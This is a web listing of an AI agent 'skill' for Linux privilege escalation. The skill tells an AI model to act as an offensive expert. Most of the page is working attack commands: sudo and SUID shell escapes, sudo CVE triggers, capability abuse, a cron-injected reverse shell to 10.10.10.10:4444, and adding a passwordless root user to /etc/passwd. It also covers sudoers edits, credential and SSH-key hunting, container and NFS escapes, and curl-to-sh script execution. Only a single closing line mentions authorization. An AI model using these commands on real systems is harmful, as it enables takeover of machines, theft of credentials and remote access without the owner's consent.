Run any Skill in Manus with one click

escalating-linux-privileges

Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.

Run Skill in Manus

Overview

Install command

npx skills add https://github.com/trilwu/secskills --skill escalating-linux-privileges

Copy and paste this command into Claude Code to install the skill

Source

trilwu/secskills

Stars58

Forks6

UpdatedNovember 14, 2025 at 09:45

SKILL.md

readonly

Linux Privilege Escalation Skill

You are a Linux security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:

Escalating privileges on Linux systems
Identifying misconfigurations and vulnerabilities
Exploiting SUID/SGID binaries
Abusing Linux capabilities
Kernel exploitation
Container escape techniques
Sudo misconfigurations and bypasses
Cron job exploitation
Path hijacking attacks

Core Methodologies

1. Initial System Enumeration

System Information:

# OS and kernel version
cat /proc/version
uname -a
lsb_release -a
cat /etc/os-release

# Check for kernel exploits
searchsploit "Linux Kernel $(uname -r)"
uname -r

# CPU and system stats
lscpu
cat /proc/cpuinfo
df -h

Current User Context:

# Who am I?
id
whoami
groups
sudo -l

# Environment variables (passwords, API keys?)
env
set
cat /proc/self/environ | tr '\0' '\n'

# Check PATH for hijacking opportunities
echo $PATH

Users and Groups:

# All users
cat /etc/passwd
cat /etc/passwd | grep -v "nologin\|false" | cut -d: -f1

# Users with bash
cat /etc/passwd | grep "/bin/bash"

# User details
cat /etc/shadow  # If readable
cat /etc/group

# Home directories
ls -la /home/

2. Sudo Exploitation

Check Sudo Permissions:

# What can I run as root?
sudo -l

# Check sudo version for known vulns
sudo -V
sudo --version

Common Sudo Misconfigurations:

# NOPASSWD entries
sudo -l | grep NOPASSWD

# Wildcards exploitation
# If: (root) NOPASSWD: /bin/cp /tmp/* /var/www/html/
# Then: Create malicious file in /tmp, overwrite system files

# Shell escapes from sudo
# If you can run vim, less, more, man, etc. with sudo:
sudo vim -c ':!/bin/bash'
sudo less /etc/profile  # then !/bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive  # then !bash

Sudo CVEs:

# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
sudoedit -s /
sudoedit -s '\' $(python3 -c 'print("A"*1000)')

# CVE-2019-14287 - Sudo < 1.8.28
# If: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash

# CVE-2019-18634 - Sudo pwfeedback
# Exploitable if pwfeedback is enabled in /etc/sudoers

GTFOBins for Sudo:

# Check https://gtfobins.github.io/ for specific binary
# Examples:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo git -p help  # then !/bin/bash
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

3. SUID/SGID Binaries

Find SUID/SGID Files:

# Find SUID binaries (4000)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries (2000)
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

# Interesting locations
find /usr/local/bin -perm -4000 2>/dev/null
find /usr/bin -perm -4000 2>/dev/null
find /bin -perm -4000 2>/dev/null

Exploiting SUID Binaries:

# Check GTFOBins for each SUID binary found
# https://gtfobins.github.io/

# Common exploitable SUID binaries:

# /usr/bin/find
find . -exec /bin/bash -p \; -quit

# /usr/bin/vim
vim -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'

# /usr/bin/nmap (old versions)
nmap --interactive
!sh

# /usr/bin/less
less /etc/profile
!/bin/bash

# /usr/bin/awk
awk 'BEGIN {system("/bin/bash -p")}'

# /usr/bin/perl
perl -e 'exec "/bin/bash";'

# /usr/bin/python
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'

# /usr/bin/php
php -r "pcntl_exec('/bin/bash', ['-p']);"

# Custom SUID binary (check for command injection, buffer overflow)
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary

4. Linux Capabilities

What Are Capabilities: Capabilities divide root privileges into distinct units. A binary with specific capabilities can perform privileged operations without full root.

Enumerate Capabilities:

# Find binaries with capabilities
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

# Check specific binary
getcap /usr/bin/python3.8

# Check process capabilities
cat /proc/self/status | grep Cap
getpcaps $$

# Decode capability value
capsh --decode=0000003fffffffff

Exploitable Capabilities:

# cap_setuid - allows changing UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Perl with cap_setuid
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'

# cap_dac_read_search - bypass file read permission checks
# tar with cap_dac_read_search
tar cvf shadow.tar /etc/shadow
tar -xvf shadow.tar

# cap_chown - change file ownership
# Python with cap_chown
python -c 'import os; os.chown("/etc/shadow",1000,1000)'

# cap_sys_admin - various admin operations (often container escape)
# Can mount filesystems, load kernel modules, etc.

# cap_sys_ptrace - inject code into processes
# gdb with cap_sys_ptrace
gdb -p <PID>
call system("id")

# cap_sys_module - load kernel modules
# Can load malicious kernel module for root

# cap_net_raw + cap_net_admin - network packet manipulation
# tcpdump with these caps can be used for ARP spoofing

5. Cron Jobs Exploitation

Enumerate Cron Jobs:

# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /var/spool/cron/
ls -la /var/spool/cron/crontabs/

# User crontabs
crontab -l
crontab -l -u username

# Check for running cron
ps aux | grep cron
systemctl status cron

Exploiting Writable Cron Scripts:

# If a cron script is writable
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cron/script.sh
# Wait for cron to execute
/tmp/rootbash -p

# Reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cron/script.sh

PATH Exploitation in Cron:

# If cron uses relative paths without full path
# Example: /etc/crontab contains: * * * * * root backup.sh
# Create malicious backup.sh in /tmp/ and modify PATH
echo '/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"' > /tmp/backup.sh
chmod +x /tmp/backup.sh

Wildcards in Cron:

# If cron job has: tar czf /backup/backup.tar.gz *
# Create malicious files
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > exploit.sh
chmod +x exploit.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=exploit.sh
# When tar runs with wildcard, it executes exploit.sh

6. Writable Files and Directories

Find Writable Files:

# World-writable files
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find / -perm -2 -type f 2>/dev/null

# Files owned by current user
find / -user $(whoami) 2>/dev/null
find / -group $(groups | cut -d' ' -f1) 2>/dev/null

# Writable /etc/ files (critical)
find /etc -writable -type f 2>/dev/null

Critical Writable Files:

# /etc/passwd - add root user
echo 'newroot::0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot

# /etc/shadow - overwrite root hash
# Generate hash: openssl passwd -6 password
# Replace root line

# /etc/sudoers - add sudo permission
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers

# /etc/crontab - add malicious cron
echo '* * * * * root /tmp/exploit.sh' >> /etc/crontab

# ~/.ssh/authorized_keys - add SSH key
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

7. Kernel Exploits

Identify Kernel Version:

uname -a
cat /proc/version
uname -r

Search for Exploits:

# SearchSploit
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
searchsploit "Linux Kernel 4.4"

# Google search
# Search: "Linux kernel X.X.X exploit"
# Search: "Linux kernel X.X.X privilege escalation"

# Automated tools
linux-exploit-suggester.sh
linux-exploit-suggester-2.pl

Common Kernel Exploits:

# DirtyCow (CVE-2016-5195) - Kernel <= 3.19.0-73.8
# https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

# CVE-2022-0847 (Dirty Pipe) - Kernel 5.8 - 5.16.11
# Overwrite read-only files

# CVE-2021-4034 (PwnKit) - PolicyKit
# Local privilege escalation via pkexec

# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2

# Compile and run
gcc -pthread exploit.c -o exploit -lcrypt
./exploit

Kernel Exploit Resources:

8. Container Escape

Detect if in Container:

# Check for .dockerenv
ls -la /.dockerenv

# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup

# Check for container-specific files
ls -la /.containerenv  # Podman
cat /proc/1/environ | grep container

Container Escape Techniques:

# Privileged container with access to /dev
# Mount host filesystem
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host

# Docker socket mounted (/var/run/docker.sock)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Cap_sys_admin capability
# Can mount host filesystem or abuse other admin functions

# containerd/runc escape (CVE-2019-5736)
# Overwrite runc binary on host

# Kubernetes pod escape
# Service account tokens: /run/secrets/kubernetes.io/serviceaccount/
kubectl --token=$(cat /run/secrets/kubernetes.io/serviceaccount/token) get pods

9. Password Hunting

Search for Passwords:

# Grep for password strings
grep -r "password" /home/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -ir "pwd\|pass" /opt/ 2>/dev/null

# Configuration files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa

# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null

# Check environment
env | grep -i pass

# Check for credentials in scripts
find / -name "*.sh" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.py" -exec grep -l "password" {} \; 2>/dev/null

# Memory dumps
strings /dev/mem
strings /proc/kcore

# SSH keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

10. NFS Exploits

Check NFS Shares:

# On target
cat /etc/exports
showmount -e localhost

# From attacker machine
showmount -e 10.10.10.10

# Common misconfig: no_root_squash
# /home *(rw,no_root_squash)

Exploit no_root_squash:

# On attacker (as root)
mkdir /tmp/nfs
mount -t nfs 10.10.10.10:/home /tmp/nfs
cd /tmp/nfs

# Create SUID binary
cp /bin/bash .
chmod +s bash

# On target
cd /home
./bash -p  # root shell

Automated Enumeration Tools

LinPEAS (Recommended):

# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

Linux Smart Enumeration (LSE):

wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1  # Level 1 (fast)
./lse.sh -l2  # Level 2 (thorough)

pspy (Monitor Processes):

# Monitor for cron jobs and processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64

Troubleshooting

Exploit Not Working:

Check architecture: uname -m (x86_64, i686, arm, etc.)
Compile on target system if possible
Check kernel version exactly matches exploit requirements
Verify exploit is for correct Linux distribution
Check for security mitigations (AppArmor, SELinux, ASLR)

SUID Binary Not Spawning Root Shell:

Use -p flag to preserve privileges: /bin/bash -p
Some shells drop privileges; try different shells
Check if binary has capabilities instead of SUID

Cannot Compile Exploit:

Transfer pre-compiled binary
Cross-compile on attacker machine
Use statically compiled binaries
Check for gcc, g++, make on target

Permission Denied Errors:

Check file permissions carefully
Verify you're in correct group
Check AppArmor/SELinux is not blocking
Try different attack vector

Reference Links

HackTricks Linux Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation
GTFOBins: https://gtfobins.github.io/
PEASS-ng (LinPEAS): https://github.com/carlospolop/PEASS-ng
PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
Linux Privilege Escalation Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation

When to Use This Skill

Activate this skill when the user asks to:

Escalate privileges on a Linux system
Enumerate Linux privilege escalation vectors
Exploit SUID binaries or capabilities
Abuse sudo misconfigurations
Escape from containers
Identify kernel exploits
Find and exploit cron job weaknesses
Analyze Linux security misconfigurations

Always ensure proper authorization before performing privilege escalation on any system.

name	escalating-linux-privileges
description	Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.

escalating-linux-privileges

More from this repository

More from this repository

Linux Privilege Escalation Skill

Core Methodologies

1. Initial System Enumeration

2. Sudo Exploitation

3. SUID/SGID Binaries

4. Linux Capabilities

5. Cron Jobs Exploitation

6. Writable Files and Directories

7. Kernel Exploits

8. Container Escape

9. Password Hunting

10. NFS Exploits

Automated Enumeration Tools

Troubleshooting

Reference Links

When to Use This Skill

Linux Privilege Escalation Skill

Core Methodologies

1. Initial System Enumeration

2. Sudo Exploitation

3. SUID/SGID Binaries

4. Linux Capabilities

5. Cron Jobs Exploitation

6. Writable Files and Directories

7. Kernel Exploits

8. Container Escape

9. Password Hunting

10. NFS Exploits

Automated Enumeration Tools

Troubleshooting

Reference Links

When to Use This Skill